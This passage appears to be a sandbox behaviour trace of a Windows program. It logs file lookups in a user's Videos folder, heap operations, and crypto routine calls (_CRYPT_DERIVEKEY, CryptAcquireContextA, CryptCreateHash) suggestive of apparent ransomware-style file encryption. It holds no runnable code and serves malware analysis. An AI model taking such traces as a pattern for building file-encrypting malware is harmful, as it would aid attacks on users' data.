wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.632] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.632] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.633] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f5e8260, ftCreationTime.dwHighDateTime=0x1d5dd9d, ftLastAccessTime.dwLowDateTime=0x7011bde0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0x7011bde0, ftLastWriteTime.dwHighDateTime=0x1d5e2d5, nFileSizeHigh=0x0, nFileSizeLow=0xf4b5, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="4Us08VSplrH Ofh79JeB.mkv", cAlternateFileName="4US08V~1.MKV")) returned 0x90af58 [0194.633] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0194.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0194.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0194.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0194.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.633] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.633] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0194.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0194.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0194.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.633] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.633] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0194.633] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0194.634] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.634] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0194.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0194.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0194.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0194.634] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0194.634] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.634] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0194.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0194.635] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.635] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0194.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0194.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba168 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0194.635] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0194.635] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0194.636] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0194.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0194.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0194.636] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0194.636] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0194.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0194.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0194.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0194.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0194.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0194.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0194.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0194.637] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.637] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0194.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0194.637] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0194.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0194.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0194.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0194.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0194.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0194.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0194.638] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0194.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0194.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0194.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0194.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0194.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0194.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0194.639] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0194.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0194.639] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0194.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.640] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0194.640] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0194.640] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.640] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.640] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.640] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0194.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.640] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0194.640] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.640] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0194.640] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0194.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0194.640] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0194.640] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0194.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0194.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.640] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.641] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0194.641] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0194.641] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0194.641] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0194.641] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.641] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0194.641] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0194.641] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.641] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.642] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0194.642] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0194.642] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0194.642] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0194.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0194.642] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0194.642] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0194.642] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0194.642] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0194.642] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0194.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0194.643] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0194.643] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0194.643] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0194.643] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0194.643] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0194.643] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, 